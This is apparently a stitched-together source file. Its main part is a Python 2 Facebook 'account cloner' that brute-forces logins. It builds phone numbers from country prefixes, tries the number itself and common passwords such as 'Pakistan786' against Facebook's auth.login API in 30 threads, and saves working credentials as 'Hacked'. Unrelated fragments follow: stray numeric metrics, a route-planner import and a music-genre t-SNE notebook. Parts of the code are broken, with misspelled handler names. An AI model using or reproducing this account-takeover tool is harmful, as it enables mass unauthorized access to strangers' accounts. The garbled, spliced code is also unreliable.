<̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷>̷
"""
logo2 = """
\033[1;92m
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
██████╗░███████╗░█████╗░██╗░░░░░
██╔══██╗██╔════╝██╔══██╗██║░░░░░
██████╔╝█████╗░░███████║██║░░░░░
██╔══██╗██╔══╝░░██╔══██║██║░░░░░
██║░░██║███████╗██║░░██║███████╗
╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝╚══════╝
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
╭┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳╮
┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃
╰┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻╯
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
░██████╗████████╗░█████╗░██████╗░
██╔════╝╚══██╔══╝██╔══██╗██╔══██╗
╚█████╗░░░░██║░░░███████║██████╔╝
░╚═══██╗░░░██║░░░██╔══██║██╔══██╗
██████╔╝░░░██║░░░██║░░██║██║░░██║
╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝╚═╝░░╚═╝
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
<̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷>̷
██████╗░░█████╗░███╗░░██╗░██████╗░██╗░░░░░░█████╗░
██╔══██╗██╔══██╗████╗░██║██╔════╝░██║░░░░░██╔══██╗
██████╦╝███████║██╔██╗██║██║░░██╗░██║░░░░░███████║
██╔══██╗██╔══██║██║╚████║██║░░╚██╗██║░░░░░██╔══██║
██████╦╝██║░░██║██║░╚███║╚██████╔╝███████╗██║░░██║
╚═════╝░╚═╝░░╚═╝╚═╝░░╚══╝░╚═════╝░╚══════╝╚═╝░░╚═╝
<̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷>̷
"""
CorrectUsername = "Real"
CorrectPassword = "Star"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;97m\x1b[1;92mU/N \x1b[1;93m♦⚫█▶\x1b[1;97m")
if (username == CorrectUsername):
password = raw_input("\033[1;97m \x1b[1;92mU/P \x1b[1;93m♦⚫█▶\x1b[1;97m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:SOMI
time.sleep(2)
loop = 'false'
else:
print "\033[1;94mWrong Password"
os.system('xdg-open https://m.facebook.comSOMIMISICAN.com')
else:
print "\033[1;94mWrong Username"
os.system('xdg-open https://m.facebook.comSOMIMUSICAN.com')
##### LICENSE #####
#=================#
def lisensi():
os.system('clear')
login()
####login#########
def login():
os.system('clear')
print logo1
print "\033[1;91m[1]\x1b[1;97mSTART WITH REAL STAR( \033[1;92m NOW)"
time.sleep(0.05)
print '\x1b[1;94m[0]\033[1;91m Exit ( Back)'
pilih_login()
def pilih_login():
peak = raw_input("\n\033[1;95mCHOOSE: \033[1;93m")
if peak =="":
print "\x1b[1;97mFill In Correctly"
pilih_login()
elif peak =="1":
Zeek()
def Zeek():
os.system('clear')
print logo1
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[1] Bangladesh\033[1;91m☆.\x1b[1;96m[14] Australia'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[2] U.S.A \033[1;91m☆.\x1b[1;96m[15] Canada'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[3] U.K \033[1;91m☆.\x1b[1;96m[16] China'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[4] India \033[1;91m☆.\x1b[1;96m[17] Denmark'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[5] Brazil \033[1;91m☆.\x1b[1;96m[18] France'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[6] Japan \033[1;91m☆.\x1b[1;96m[19] Germany'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[7] Korea \033[1;91m☆.\x1b[1;96m[20] Malaysia'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[8] Italy \033[1;91m☆.\x1b[1;96m[21] Srilanka'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[9] Spain \033[1;91m☆.\x1b[1;96m[22] Turkey'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[10] Poland \033[1;91m☆.\x1b[1;96m[23] U.A.E'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[11] Pakistan \033[1;91m☆.\x1b[1;96m[24] SaudiArabia'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[12] Indonesia \033[1;91m☆.\x1b[1;96m[25] Israel'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[13] Greece \033[1;91m☆.\x1b[1;96m[26] Iran'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;91m[0] Back '
time.sleep(0.05)
action()
def action():
FreakedDudex = raw_input('\n\033[1;91mChoose an Option>>> \033[1;95m')
if FreakedDudex =='':
print '[!] Fill in correctly'
action()
elif FreakedDudex =="1":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m175,165,191, 192, 193, 194, 195, 196, 197, 198, 199")
try:
c = raw_input("\033[1;95m choose code : ")
k="+880"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="2":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m555,786, 815, 315, 256, 401, 718, 917, 202, 701, 303, 703, 803, 999, 708")
try:
c = raw_input("\033[1;95m choose code : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="3":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m715,785,765,725,745,735,737, 706, 748, 783, 739, 759, 790")
try:
c = raw_input(" \033[1;95mchoose code : ")
k="+44"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="4":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m905,975,755,855,954, 897, 967, 937, 700, 727, 965, 786, 874, 856, 566, 590, 527, 568, 578")
try:
c = raw_input(" \033[1;95mchoose code : ")
k="+91"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="5":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m127, 179, 117, 853, 318, 219, 834, 186, 479, 113")
try:
c = raw_input("\033[1;95m choose code : ")
k="+55"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="6":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m11, 12, 19, 16, 15, 13, 14, 18, 17")
try:
c = raw_input("\033[1;95m choose code : ")
k="+81"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="7":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m1, 2, 3, 4, 5, 6, 7, 8, 9")
try:
c = raw_input("\033[1;95m choose code : ")
k="+82"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="8":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m311,323,385,388, 390, 391, 371, 380, 368, 386, 384, 332, 344, 351, 328")
try:
c = raw_input("\033[1;95m choose code : ")
k="+39"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="9":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m655,755,60, 76, 73, 64, 69, 77, 65, 61, 75, 68")
try:
c = raw_input("\033[1;95m choose code : ")
k="+34"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="10":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m66, 69, 78, 79, 60, 72, 67, 53, 51")
try:
c = raw_input("\033[1;95m choose code : ")
k="+48"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="11":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m01, ~to~~, 49")
try:
c = raw_input("\033[1;95m choose code : ")
k="03"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="12":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m81,83,85,84,89,")
try:
c = raw_input("\033[1;95m choose code : ")
k="+880"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="13":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first four digits and the last seven digits of any phone number in this country.Write the remaining digits here.69,693,698,694,695")
try:
c = raw_input("\033[1;95m choose code : ")
k="+3069"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakexDudex()
elif FreakedDudex =="14":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.455")
try:
c = raw_input("\033[1;95m choose code : ")
k="+61"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="15":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first one digits and the last seven digits of any phone number in this country.Write the remaining digits here.555,")
try:
c = raw_input("\033[1;95m choose code : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="16":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.1355,1555,1855,")
try:
c = raw_input(" \033[1;95mchoose code : ")
k="+86"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakexDudex()
elif FreakexDudex =="17":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.2,3,4,5,6,7,8")
try:
c = raw_input(" \033[1;95mchoose code : ")
k="+45"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakexDudex()
elif FreakedDudex =="18":
print (logo1)
os.system("clear")
print (logo1)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.65,70,73,74,76,77")
try:
c = raw_input("\033[1;95m choose code : ")
k="+33"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="19":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.151,152,153,155,157,159,160,162,179,163,174,163")
try:
c = raw_input("\033[1;95m choose code : ")
k="+49"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakexDudex()
elif FreakedDudex =="20":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.11,12,13,14,15,16,17,18,19")
try:
c = raw_input("\033[1;95m choose code : ")
k="+60"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="21":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.71,72,73,74,75,76,77,78")
try:
c = raw_input("\033[1;95m choose code : ")
k="+94"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="22":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.55,54,53,52,50")
try:
c = raw_input("\033[1;95m choose code : ")
k="+90"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="23":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first tree digits and the last seven digits of any phone number in this country.Write the remaining digits here.50,55,58,54,56")
try:
c = raw_input("\033[1;95m choose code : ")
k="+971"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="24":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first three digits and the last seven digits of any phone number in this country.Write the remaining digits here.50,51,52,53,54,55,56,57,58,")
try:
c = raw_input("\033[1;95m choose code : ")
k="+966"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="25":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first three digits and the last seven digits of any phone number in this country.Write the remaining digits here. 52,55")
try:
c = raw_input("\033[1;95m choose code : ")
k="+972"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="26":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.990,915,901,933,938,902")
try:
c = raw_input("\033[1;95m choose code : ")
k="+98"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =='0':
login()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
jalan ('[✓] Total Numbers: '+xxx)
time.sleep(0.05)
jalan(' \033[1;93mPlz Wait Cloned Accounts Will Appear Here')
time.sleep(0.05)
jalan ('[!] To Stop Process Press CTRL Then Press z')
time.sleep(0.05)
print 44*'-'
print (logo2)
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m{Hacked 100%💉} ' + k + c + user + ' 》 ' + pass1+'\n'+"\n"
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'-•◈•-'+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;96m[24Hours] ' + k + c + user + ' 》 ' + pass1+'\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'-•◈•-'+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
else:
pass2="786786"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m{Hacked 100%💉} ' + k + c + user + ' 》 ' + pass2+'\n'+"\n"
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'-•◈•-'+pass2+'\n')
okb.close()
oks.append(c+user+pass2)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;96m[24Hours] ' + k + c + user + ' 》 ' + pass2+'\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'-•◈•-'+pass2+'\n')
cps.close()
cpb.append(c+user+pass2)
else:
pass3="Pakistan"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m{Hacked 100%💉} ' + k + c + user + ' 》 ' + pass3+'\n'+"\n"
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'-•◈•-'+pass3+'\n')
okb.close()
oks.append(c+user+pass3)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;96m[24Hours] ' + k + c + user + ' 》 ' + pass3+'\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'-•◈•-'+pass3+'\n')
cps.close()
cpb.append(c+user+pass3)
else:
pass4="Pakistan786"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m{Hacked 100%💉} ' + k + c + user + ' 》 ' + pass4+'\n'+"\n"
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'-•◈•-'+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;96m[24Hours] ' + k + c + user + ' 》 ' + pass4+'\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'-•◈•-'+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 44*'-'
print '[✓] Process Has Been Completed ....'
print '[✓] Total OK/CP : '+str(len(oks))+'/'+str(len(cpb))
print('[✓] CP File Has Been Saved : save/checkpoint.txt')
print """
"""
raw_input("\n\033[1;95m[\033[1;91mBack\033[1;95m]")
login()
if __name__ == '__main__':
login()
| 37.155102
| 321
| 0.496942
| 4,826
| 27,309
| 3.359511
| 0.117281
| 0.171837
| 0.255721
| 0.338247
| 0.812434
| 0.792142
| 0.787084
| 0.768827
| 0.74872
| 0.738481
| 0
| 0.098289
| 0.199385
| 27,309
| 734
| 322
| 37.205722
| 0.498811
| 0.003882
| 0
| 0.678779
| 0
| 0.075581
| 0.497312
| 0.245361
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.056686
| 0.013081
| null | null | 0.213663
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 11
|
b18983696440cf0120a7df9de91697a34d62003d
| 114
|
py
|
Python
|
map/__init__.py
|
idlebear/carla-fun
|
e95e25ba99c46eb1545ed539d33f0c2b20829e56
|
[
"MIT"
] | null | null | null |
map/__init__.py
|
idlebear/carla-fun
|
e95e25ba99c46eb1545ed539d33f0c2b20829e56
|
[
"MIT"
] | null | null | null |
map/__init__.py
|
idlebear/carla-fun
|
e95e25ba99c46eb1545ed539d33f0c2b20829e56
|
[
"MIT"
] | null | null | null |
from .global_route_planner import GlobalRoutePlanner
from .global_route_planner_dao import GlobalRoutePlannerDAO
| 28.5
| 59
| 0.903509
| 13
| 114
| 7.538462
| 0.615385
| 0.204082
| 0.306122
| 0.44898
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 114
| 3
| 60
| 38
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
49367bf18223f0c56943ae794539f760c102eabe
| 46,832
|
py
|
Python
|
3_models.py
|
shivanirmishra/musicgenre
|
954214b6f7756c05de1253702811fd69dd99b0e2
|
[
"MIT"
] | null | null | null |
3_models.py
|
shivanirmishra/musicgenre
|
954214b6f7756c05de1253702811fd69dd99b0e2
|
[
"MIT"
] | null | null | null |
3_models.py
|
shivanirmishra/musicgenre
|
954214b6f7756c05de1253702811fd69dd99b0e2
|
[
"MIT"
] | null | null | null |
from google.colab import drive
drive.mount('/content/drive')
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/4classdata.csv')
"""##**Applying different models to data**"""
from matplotlib import pyplot as plt
def correlation_matrix(data, filename='output'):
f = plt.figure(figsize=(19, 15))
plt.matshow(data.corr(), fignum=f.number)
plt.xticks(range(data.shape[1]), data.columns, fontsize=10, rotation=90)
plt.yticks(range(data.shape[1]), data.columns, fontsize=10)
cb = plt.colorbar()
cb.ax.tick_params(labelsize=12)
plt.show()
correlation_matrix(data)
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
def tsne2D(): # this function is used to apply tsne on dataset_1 to reduce it to two dimensions
# calling tsne for perplexities 30 and 40
tsneDatasetOneTwoDimPerp_30 = TSNE().fit_transform(X_norm)
#tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
# plotting the tsne data
fig, img = plt.subplots(1,1,figsize=(15,5),sharex='col', sharey='row')
ax11 = img.scatter(tsneDatasetOneTwoDimPerp_30[:,0],tsneDatasetOneTwoDimPerp_30[:,1], c = y)
#ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0],tsneDatasetOneTwoDimPerp_40[:,1], c = y_subset)
cbar = plt.colorbar(ax11)
#ticks = [0,1,2,3,4,5,6,7,8,9]
#cbar.set_ticks(ticks)
fig.suptitle("Perplexity 30")
#cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne2D()
def tsne2D(): # this function is used to apply tsne on dataset_1 to reduce it to two dimensions
# calling tsne for perplexities 30 and 40
tsneDatasetOneTwoDimPerp_30 = TSNE(n_components=3).fit_transform(X_norm)
#tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
# plotting the tsne data
fig = plt.figure(figsize = (10, 7))
ax = plt.axes(projection ="3d")
ax11 = ax.scatter(tsneDatasetOneTwoDimPerp_30[:,0],tsneDatasetOneTwoDimPerp_30[:,1],tsneDatasetOneTwoDimPerp_30[:,2], c = y)
